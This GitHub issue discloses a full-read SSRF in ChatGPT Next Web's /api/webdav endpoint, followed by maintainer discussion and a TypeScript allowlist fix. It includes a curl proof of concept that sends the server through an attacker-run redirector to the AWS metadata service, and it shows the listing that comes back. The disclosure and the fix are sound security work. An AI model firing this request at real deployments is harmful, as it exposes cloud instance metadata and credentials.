Comments (8)
We will solve this problem by whitelisting webdav endpoints
Bug Description
The v2.11.3 release removed the /api/cors endpoint but added a new /api/webdav endpoint. This new endpoint is also vulnerable to full-read SSRF.
Steps to Reproduce
Let's call the attacker IP "attacker-ip", and the vulnerable ChatGPT Next Web target IP "target-ip".
An attacker would first set up an HTTP redirector on their IP. This redirector will respond to HTTP requests by returning an HTTP redirect with the Location header set to an endpoint in the internal network of the "target-ip".
For instance, let's say the redirector is running on port 46732 on the "attacker-ip" and it's set up to redirect to http://169.254.169.254/latest/meta-data (AWS metadata service).
Then the attacker makes a request to the webdav endpoint that looks like this:
curl --path-as-is 'http://target-ip:3000/api/webdav/a:/chatgpt-next-web/backup.json?endpoint=http://<attacker-ip>:46732'
The /api/webdav handler will fetch "http://attacker-ip:46732/a:/chatgpt-next-web/backup.json", which will then redirect to http://169.254.169.254/latest/meta-data, resulting in the attacker getting an output like this:
ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hibernation/ hostname iam/ identity-credentials/ instance-action instance-id instance-life-cycle instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/ system
Expected Behavior
The right solution is to allow the user to configure the WebDAV URLs in server-side config, and for the application to only allow access to those URLs. Redirects could be disabled, but it'd still be vulnerable to blind SSRF.
Screenshots
No response
Deployment Method
- Docker
- Vercel
- Server
Desktop OS
No response
Desktop Browser
No response
Desktop Browser Version
No response
Smartphone Device
No response
Smartphone OS
No response
Smartphone Browser
No response
Smartphone Browser Version
No response
Additional Logs
No response
Is it still affected by the latest commits (unreleased) c0c54e5?
Waiting for the info...
Haven't tested the latest, but from the code it appears to be affected. The attacker fully controls the endpoint the server reaches out to, and the server can be redirected back to arbitrary internal URLs.
I'll patch a separate version to disable redirect, @nvn1729 do you have any other suggestions?
Merged in #4381
One approach is for the user to define an allowlist of webdav endpoints in server-side config, and the webdav API should only allow access to those specific endpoints.
Disabling redirects helps but it'll still leave the app vulnerable to blind SSRF.
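As an added example (not code from ChatGPT-Next-Web or from either commenter), the TypeScript below shows the fix proposed in this thread: a server-side allowlist of WebDAV endpoints checked before any upstream request, with redirects treated as errors rather than followed. The allowlist entry, the function names and the `endpoint`/`path` inputs are assumptions for illustration.

```typescript
// Constructed sample config value; in a real deployment this comes from
// server-side configuration, never from the request.
export const WEBDAV_ENDPOINT_ALLOWLIST: readonly string[] = [
  "https://dav.example.com/remote.php/dav/files/user/",
];

// Parse and normalise a URL for comparison; null means "reject".
export function parseEndpoint(raw: string): URL | null {
  let u: URL;
  try {
    u = new URL(raw);
  } catch {
    return null;
  }
  if (u.protocol !== "https:" && u.protocol !== "http:") return null;
  if (u.username !== "" || u.password !== "") return null; // no user@host tricks
  u.hash = "";
  if (!u.pathname.endsWith("/")) u.pathname += "/"; // compare whole segments only
  return u;
}

// True only when the URL shares an origin with an allowlisted entry and its
// (dot-segment-normalised) path stays under the allowlisted prefix.
export function isAllowedEndpoint(raw: string, allowlist = WEBDAV_ENDPOINT_ALLOWLIST): boolean {
  const u = parseEndpoint(raw);
  if (u === null) return false;
  return allowlist.some((entry) => {
    const allowed = parseEndpoint(entry);
    return allowed !== null && allowed.origin === u.origin && u.pathname.startsWith(allowed.pathname);
  });
}

// Build the upstream GET for `<endpoint>/<path>`, or null when the endpoint is
// not allowlisted. Redirects are treated as errors and never followed.
export function buildUpstreamRequest(
  endpoint: string,
  path: string,
  allowlist = WEBDAV_ENDPOINT_ALLOWLIST,
): { url: string; init: { method: string; redirect: "error" } } | null {
  const base = parseEndpoint(endpoint);
  if (base === null || !isAllowedEndpoint(base.href, allowlist)) return null;
  const target = new URL(base.href);
  // Append via the pathname setter rather than resolving `path` as a relative
  // URL, so a value such as "a:/x" cannot be parsed as an absolute URL of its own.
  target.pathname = base.pathname + path.replace(/^\/+/, "");
  // ".." inside `path` could still climb out of the prefix: re-check the result.
  if (!isAllowedEndpoint(target.href, allowlist)) return null;
  return { url: target.href, init: { method: "GET", redirect: "error" } };
}
```

The returned `init` is meant to be passed to `fetch(url, init)`; with `redirect: "error"` a 3xx from the allowlisted server rejects the request instead of steering it elsewhere.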